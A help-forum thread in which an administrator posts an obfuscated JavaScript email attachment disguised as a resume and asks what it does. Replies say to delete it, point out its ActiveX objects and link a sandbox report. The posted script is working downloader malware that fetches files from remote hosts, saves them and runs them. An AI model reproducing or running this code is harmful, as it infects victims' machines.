asked on

Malicious javascript pretending to be a resume: What does this script do?

Hi guys,

I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.

(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn

Open in new window

My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew

John

I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.

defecta

ASKER

I appreciate that, and I do too but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.

I would really appreciate some insight into what the purpose of this script is and what it's trying to do.

I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?

Cheers.

ASKER CERTIFIED SOLUTION

Dave Baldwin

membership

This solution is only available to members.

To access this solution, you must be a member of Experts Exchange.

Start Free Trial

defecta

ASKER

Thanks Dave.

Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?

Dave Baldwin

I don't know. I saw this part...

var GkqB = new ActiveXObject(

Open in new window

which declares a new ActiveXObject but since most of the javascript is encoded (and I won't run it to decode it), I can't tell where it is going to get it.

I just noticed another ActiveXObject in the first line of the script.

Scott Fell

I uploaded the file to malwr.com to check out https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/